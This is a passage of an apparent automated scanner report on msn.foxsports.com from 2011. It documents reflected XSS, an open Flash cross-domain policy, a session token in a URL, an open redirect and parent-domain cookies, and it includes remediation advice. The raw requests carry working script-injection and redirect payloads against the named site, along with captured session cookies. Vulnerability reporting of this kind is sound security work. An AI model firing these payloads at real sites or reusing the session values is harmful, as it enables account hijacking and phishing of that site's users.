Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/college-football?vid=b22c5085-d0f5-494f-a5a9-b497c96d123260927"%3balert(1)//893fe2fe98&from=en-us_msnhp HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 204352
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=26
Date: Fri, 07 Jan 2011 21:53:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 640, 400, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "b22c5085-d0f5-494f-a5a9-b497c96d123260927";alert(1)//893fe2fe98", "player.c": "v", "player.v": "b22c5085-d0f5-494f-a5a9-b497c96d123260927";alert(1)//893fe2fe98" }, 'Player1');</script>
...[SNIP]...

3.26. http://msn.foxsports.com/video/shows/what-the-fox [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video/shows/what-the-fox

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f44"%3balert(1)//38ce12b4193 was submitted in the vid parameter. This input was echoed as c8f44";alert(1)//38ce12b4193 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/shows/what-the-fox?vid=f8283acb-2bc1-4a12-bb76-d24b6a25d55fc8f44"%3balert(1)//38ce12b4193&from=en-us_msnhp&gt1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 202021
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=22
Date: Fri, 07 Jan 2011 21:53:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 640, 400, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "f8283acb-2bc1-4a12-bb76-d24b6a25d55fc8f44";alert(1)//38ce12b4193", "player.c": "v", "player.v": "f8283acb-2bc1-4a12-bb76-d24b6a25d55fc8f44";alert(1)//38ce12b4193" }, 'Player1');</script>
...[SNIP]...

4. Flash cross-domain policy  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/component/flash/Toolbar
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Oct 2010 12:10:32 GMT
ETag: W/"209-1286280632000"
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/xml
Content-Length: 209
Cache-Control: private, max-age=50840
Date: Sat, 08 Jan 2011 01:10:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

5. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /module/pollaction

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /module/pollaction;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:29:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 10981

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

6. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/register

Issue detail

The value of the fu request parameter is used to perform an HTTP redirect. The payload http%3a//a1790e5775f23b218/a%3f was submitted in the fu parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /account/register?fu=http%3a//a1790e5775f23b218/a%3f HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://a1790e5775f23b218/a?
Content-Length: 0
Expires: Sat, 08 Jan 2011 01:11:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:39 GMT
Connection: close


7. Cookie scoped to parent domain  previous  next
There are 4 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


7.1. http://msn.foxsports.com/account/logout  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/logout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/logout HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://msn.foxsports.com/account/transition?fu=%2F&initiatingAction=logout
Content-Length: 0
Expires: Sat, 08 Jan 2011 01:12:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:12:06 GMT
Connection: close
Set-Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pLMD="2011-01-08 00:30:34"; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_LNAME=/wgeX1XilBI=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pRME=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: UnicaNIODID=I7HpnSWrYC7-Ww6qltH; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_FNAME=Z1NVLTXWY1w=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _gig_mig=1; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pEFSUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NetInsightSessionID=1; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _chartbeat2=oxy92bi233plhtq3; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pExternalUser=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: MUID=65AFF4B77A124856A6B4337A160FA285; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/


7.2. http://msn.foxsports.com/account/verify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/verify

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/verify?euid=%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
